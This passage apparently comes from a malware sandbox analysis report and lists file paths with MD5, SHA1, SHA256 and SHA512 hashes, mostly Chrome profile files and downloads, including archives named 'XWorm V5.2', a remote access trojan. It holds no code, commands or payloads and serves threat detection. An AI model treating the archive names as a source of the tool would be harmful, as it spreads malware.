| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 30daf3e3bab537f5cfc67bb1b173cc5c |
| SHA1 | 38add45ffdf07350024b8994a1d6e80d9448aeb7 |
| SHA256 | a30b7cbf0f12c83b9b2df18a22bd4b0810933c1837a202cb717d9ec38f6b82f1 |
| SHA512 | e38b8ab6bfe4a0666bdf5e0a13878f1d28a228bc9f2278736c4f03a2d656e1703e2e126cf67ec24b4b2b612e38fe05c048e2564a0b7d0e7bf7b5b7d54611d7ac |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 3c5fc7a5bb031a028685810dfe3f6017 |
| SHA1 | 3cc3ff2ab6c628f1711d7ec635bda52c265ed74f |
| SHA256 | 34d022600edc479abd14503028e0d2abd55144bcc8f4a2cf754b9a06357a48da |
| SHA512 | 903cfeb9d24ebbd317e13c2e0d963b8f8c70149ceb5a743edd8d9f37c0ff1557af146378e7d6f4b02c0e3a65985b33190a10c56440c27a2850fc316a0135e06e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 03a3aed44d9611a96e2ff3224a198f69 |
| SHA1 | 07bf625c50c96d538e3833f4750d9afbe0394fa7 |
| SHA256 | 4446ed1a89987a87de90bc4dbf399ec827d6dde4468f91b3cf70ebf1f212419c |
| SHA512 | 668f7b0009195e65560560e944889d1ef2299d006dc688677acd5e2647746b3c3e1b99aea70ed6f3d36d8e64bf365202d7167e7660734b9f92c035e029c3194c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | f6b147dfaa10c7d0809c066745489236 |
| SHA1 | 037b2487e11029a928feff996979b49ae32b2cfc |
| SHA256 | a22cd14f73fd0f46e2930ac38fe2bc2c2e38eeafb5a1069e11be075f10c82e1e |
| SHA512 | c9666f1b21767760d3bf791eb89db019066cc1286bb5f5557006c7c98ddef2f6ff255ff41ac080b026c856b6d649710e7a77b228cf3c794daa30cc5e1702f7fe |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\9707e432-c94c-4b14-817b-54ea8794cf92\index-dir\the-real-index
| MD5 | 80233565ec1de929ce603b4481a773ef |
| SHA1 | f8becdbcb3f59c6ba04401c91c660ffe3e67b6bb |
| SHA256 | 5b75da93b26e978bd7ccbe029337e74f1b8973a4efc849683d9610bb14135366 |
| SHA512 | 506c1e15b44f0c982f6a7b1f48bba3007020d9c5a6afaeebe070926634cb0a96f5dd456890eae692b6540d9358efd06ed29f6ff0e6ea82fd3ee2abd76f8cbbaf |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 5122261158d8c3d96c5e9a9093f9a4f1 |
| SHA1 | f11b03e36af3983a9344925714e9d003bdf025be |
| SHA256 | d30812d521a53e0b477a77694eda26b8dd951991d83e049d7c1e1b75e1de8dbb |
| SHA512 | 72822c2ecbf23cc9605b3d77103b83e06b6a8d35739bb1d502451addffa8bf09782ce12dd05ee72515ec62068e6a9624eb2185a6eafaffcedc1788b862ed31cc |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | c7c77f81efe4e405c8a0fe38c007e1ba |
| SHA1 | d54aede3f83b4cfb2aba8b2770d9a2fe59b9fad5 |
| SHA256 | 27863bbefc7dc3a2d5757c026ab9ed0fa098903512ae921a02149878f52d56d4 |
| SHA512 | df71666f22f8f3121a4d6ee0b79625f353ab24224930feb2f173566723e9c254de91e99a25dd482195434ab0ac692820c5ad8fee6e3621a85cbfa888773482cd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 07235fb51840e56cd84176de23bf6753 |
| SHA1 | 32d7d843258cb9153c1053f39a21bd95b7d7bb6e |
| SHA256 | 5afb0b9e0b7bf8785d376ead942a625730e463e333b0f1a8a391db48d8af1d31 |
| SHA512 | ebd7e089820566ddbcb2b182743d820da95e38928fdc47c13aa1001f8ecf4094f11c7585988d485e6c28ad651102441e99dad95b057ac6c66554680412ae7655 |
C:\Users\Admin\Downloads\XWorm V5.2.rar
| MD5 | 822a54a27b8e830128528d6124184c73 |
| SHA1 | 108ce231d97138c464b1497bbfce706ceb1b3c85 |
| SHA256 | 39f0a3e0af735252d75be3593aae8ae3912bfec40886c866af8e899430924599 |
| SHA512 | 73d58a7168330c13fe520404d62d1e1adc6f7aa67b1bcdeb4c7f8faf7d66ce9ea9817ec6e2213858d9742a8f559c1d28369992d1abbf0156ea7e3eb541c5a39f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | d4adc3d04ecc28e78867862e0c1da5a7 |
| SHA1 | 6b9757f7ed2ad2e44d7a4b520980aa58b04cc64e |
| SHA256 | 1aed3b1d1602dc937380e77b158cc5f953e4cc00c5ab641eb29bb40eac2d6527 |
| SHA512 | 3cb8daa4b11711b3880fa61386d8be278d31d12cfa1fa4ad98ede67703d3d6a14b36af778b215e2b78d09c8685a46f7109f781ccfbe712e9154dc6a768957863 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | f4a4c3f4aec647341cec317784953dda |
| SHA1 | 69061bdec47d4afb0a7e233b4d3dd4230822c785 |
| SHA256 | 3eb25fff2319ab13d812c5fd18986162958d41231a108b21fc9b9419314bf12f |
| SHA512 | a863f869ab693b8a5ca2edc28f5deb0382b5f36d03475247110ce26dd46ea1ccedfe23d1a2fca3dfc23cc7a683c9da35367bf5feb0bb3bc324da3c7bced5e5b8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 63b39619e0aa4451fe01400a685ae245 |
| SHA1 | 4d48cd8937f3cc80b8213ebe07c3aed364488da8 |
| SHA256 | 66045ebccd5cc29ea4a0d5c7b449e727ad53f7fe210679ae3838138fd935ec5a |
| SHA512 | 673c13f4c7f1d67a853fdaa449d587e3446b1c2e13645b05263f8699ebcff82c330e120712cc0ba384d2acf30733f4b2ff29d5e6991b1d438fa7f676407d3b02 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | fc74f3508bf3571d6f3477776719a50d |
| SHA1 | b34e84ec1c8a22e993cc065ae0b0fb54489c89ac |
| SHA256 | 447c946875fb64d602e57defe07c1006c25e19e895948eb03b2f1419c49a6803 |
| SHA512 | de1019fd216b9b51296cc6cac21e8f17fd4508f07d35ca27d9458d04855ab8c49ed848928d6b363b1e593fa01a52148ef7ed5f20bcc86dc34ca07917edcf4122 |
C:\Users\Admin\Downloads\XWorm V5.2.zip.crdownload
| MD5 | b6dbce336c5fb82e53d62464a58a4172 |
| SHA1 | fb3e0b0437fd2ae60f71f0401788b037d407aa7d |
| SHA256 | d9535d244157ab2d229fe0256c56dc801fc81168ceb74190449cce1f80a5b1a7 |
| SHA512 | 04d144a94a6c82183b3ba57b4a4573dae0d7f15b1fdda1812c252f153e2da513abc1ae402d7895c0021b004704d8dddaa33289ff916d4c5f9e6ea6a4048dc7ae |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 8acfc9556195399e978bd305ccc2321b |
| SHA1 | 895853c9d7b604fd570213b5798df90dc4763cc6 |
| SHA256 | f4bb0a0d690c03de230d280e22d58b19b005fdeaef76ad093312ef27a80d4a57 |
| SHA512 | cca591c6715820f70a5870bf777306181f6370a23d74846506088cc064e011abddcac73e3951f054610bd0c0c8e5a6dd39cf8455a2afba84447f84b268bed7e9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 1bda4ac1a45c7501ce4c3b7c6dc60cbb |
| SHA1 | 226dee2df1d33c95a7d34b79971b5c4a41a70a18 |
| SHA256 | ee4076d180376a22a80479ca2dc013448d6ddfc859e41dc72faddbaf735c1a05 |
| SHA512 | d18752c761b3b2c1a96f1a50f1f013a650245f18ea3a40f080f72d5c254ea730722e2574cff9b146a1de1307b5f0115b366797557394c66f2dff46b6f8199dc9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | f72ff363e4d83ec12ab3076cadab5fa6 |
| SHA1 | b2b2e63c2b1b60110acbf597e4bc185b76508128 |
| SHA256 | 97a225f49f3f7fe64393844dd0b0915a0547b96507c5492cd967e2d17ca2b07b |
| SHA512 | d06e76e1b5e0e4dce484f01ebda305308f4930a006b9f3cce0174f94de4b3d5a304e74d53a25c6aba0b57dd89e2f5cf91968d9f662094c57d9c01630c411bba4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 5681659ff19350cb38054172190c1f73 |
| SHA1 | 72dfc1cd379e8902a9bb9d1e82635aa6fbab659c |
| SHA256 | 9e734bb584b255e80ce888ec4e82b5c8fb5f4d5f21c6b8c8f32515f292e3f686 |
| SHA512 | b6f215b20ec1a47f6fb77f33c94ba8102b1d026fef9c316a2f81d09ab06cc2169e78588bd843884018254077c32782702957869a79bfc971302ec095cd3d4f25 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | c71ff3a555c8ba913b8241d667010ed8 |
| SHA1 | 9ef3a3506ab69dd0c2b3bf675fbcf046ce345dd7 |
| SHA256 | 5fb1d68d130014708779916b3d55c289683537e47fb1df4a51f3155c3a2046a6 |
| SHA512 | 491842fbf838517e2586e8ec487f136d90136d88301e7e4d263dfe895a5add64670fba9467d260763b35719f09427624d1ea725121302b655dd20ef008e24bce |
C:\Users\Admin\Downloads\winrar-x64-701 (1).exe
| MD5 | 3a2f16a044d8f6d2f9443dff6bd1c7d4 |
| SHA1 | 48c6c0450af803b72a0caa7d5e3863c3f0240ef1 |
| SHA256 | 31f7ba37180f820313b2d32e76252344598409cb932109dd84a071cd58b64aa6 |
| SHA512 | 61daee2ce82c3b8e79f7598a79d72e337220ced7607e3ed878a3059ac03257542147dbd377e902cc95f04324e2fb7c5e07d1410f0a1815d5a05c5320e5715ef6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 6e4015c973305408baff090837276a47 |
| SHA1 | 69cd1a5f2bd1d8b8f6ae68c755d757b0b2895200 |
| SHA256 | 50e452a739aa40df878115e617637caceb3edc6f9b724c34367476bb7de19693 |
| SHA512 | 224bd6db90b79530c93aa0fa32098b57bd08f1702f6326917f5a1f760512518a0c69eb8d56eece2fe0fd569c2a4d8dd1a9574e8d721b52f586756661973e1cdb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 5c9845bfa1d76a9f610ae3587a486515 |
| SHA1 | a515bbe5992958ffa740ba8e71c8e18346f769a0 |
| SHA256 | bd178dedab1eb72eefe3697e7302c713d1a9c3c92bb46a684569bb122d1c48f7 |
| SHA512 | 62d8ba7ec0fa6df1a4c7dab757183d1f809cf1e53bcfb94c567079eadafca3019d6ff00b7177372b4576e2c8e2ba3bf862bf4d24802e75295303cf1c86a60ee6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 4f9ec504d2f0855635ab89ca206af51e |
| SHA1 | 6bce6d261d8a67571f26d5077cee4e2e00ef9d27 |
| SHA256 | 6a29c844c7d3d3d9cf23f873d8b2c3c6ece0415d162948ecf584d6b8ff9789bd |
| SHA512 | f4be7cf2558cc3075b43edc64ae98ffa35b42c631bf8413357d037a2c6717d20a72550b30131033725146219982f56ff5814f407c050b259cd8af9db99d0009a |
C:\Users\Admin\Downloads\winrar-x32-701.exe
| MD5 | 547e29c3d612a26d41545a31e6bac6c5 |
| SHA1 | 939b73086c7c622e86fbbc1050d8cd407cc0beff |
| SHA256 | 503d7256ab2198b774c91da1e100960b40d333bcbd1df0bcaea68cfed3f2599e |
| SHA512 | b04f136e6075c661230b9a01ab3ec94c1b5273f2e824947721c8cfc51468c51ed63513875776d59e665a50218e370d767e392ac3d10db0e385663c16ca361d7b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | d435526910387aa2a4ebb7a09c3b080c |
| SHA1 | 0aafcc27581a801dd740acffc1b2b65511b03bd8 |
| SHA256 | 44f8ffaac98426cb08fecb38e6d4430687252ef45185664befe1ec86c76752b2 |
| SHA512 | daa30e540ffb8536a7a70924a3602d5496c781af94e07323f12a0a1c57653ce52abd52b4d003b91b3183209c3954082838add83a04e369f7e29c722a5ccdfb22 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 448471535469f66f38faa25906ab52c1 |
| SHA1 | 38b716767522b87bc0f7f91d5727ea26a7bd36de |
| SHA256 | eb360bc4890e37d64655def6bafe5aa5abb62afcd913dcfd1a9b092db526c4ca |
| SHA512 | 124a5518ed5dcb288ef9a51c7c9ccabda8f676bf4520ec2b42e12a34e85fefeedb964102d198c426ed714de091e25287a5bb9fd4582d21f62679f5396679d612 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | eb6b7909e41c315ad5ffa8957e6f15e7 |
| SHA1 | e6678822114f1e9b7816a7b25308bd8184d3ebce |
| SHA256 | 7c384ddfa88d3f6585281a2d6bf06e00df47ddabf1898140ced1a1749d128737 |
| SHA512 | 8288f3de88afa59f864eb446fb3325fe2213f7be3893ccc40645cb18a44e6b68a04d17edad301ed182b6ce43145f2eb0ab7f382e46d524abf552dce9700718e7 |
C:\Users\Admin\Downloads\Unconfirmed 684374.crdownload
| MD5 | 1712143238e09e8b8af93ce0a88f2129 |
| SHA1 | 6c8c4e6c4d27a18aef7b1b7934e0e0b94595773d |
| SHA256 | 95ef8c34a3714535512dee4fde5b590393a51e7663dee8d2e10a72869a5a1f59 |
| SHA512 | 8fb21aa32d7cc3ef7c1380ce2bd42be85403e0908e7fa41251b1b049418529cc387892312bf5ba465618d57e6afcfd38e22454c81379a85d38930c67646b854e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | e2f01bb868e5ac6e1443e4fdba20bbb9 |